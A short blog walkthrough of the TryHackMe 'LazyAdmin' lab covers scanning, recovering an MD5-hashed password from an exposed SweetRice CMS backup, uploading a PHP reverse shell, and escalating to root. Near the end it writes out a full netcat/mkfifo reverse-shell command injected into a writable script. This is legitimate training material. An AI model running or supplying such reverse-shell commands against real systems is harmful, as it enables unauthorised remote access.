TryHackMe | LazyAdmin

Stacey Landrum
3 min readFeb 24, 2023

--

Run nmap

Apache server on port 80. Walk the website.

Nothing in the usual spaces -robots.txt, etc.

Run directory scanning

Let’s check out content.

“SweetRice” shows up. Subdomains show login page

Another subdomain show directory listing

My_sql-bakup looks interesting

Download and view. I noticed some possible credentials.

Turns out this is a MD5 hash. We have a password.

Let’s log in.

We may possibly be able to upload a reverse shell. The Ads section looks promising. Copy/paste php reverse shell from Pentestmonkey.

Set up listener

Activate shell

Have a reverse shell. Upgrade the shell and search for elevated privileges.

Edit the copy.sh file use this code to create a listener for a bind shell:

echo “**rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1|nc 10.10.28.188 1234 >/tmp/f” > /etc/copy.sh**

I have to redo my shell. We can run the new backup file and get a root shell

Search for flags

--

--

Stacey Landrum
Stacey Landrum

Written by Stacey Landrum

Cybersecurity analyst with a CySA+ certification and a background in accounting. Passionate about protecting digital assets & staying ahead of emerging threats.

No responses yet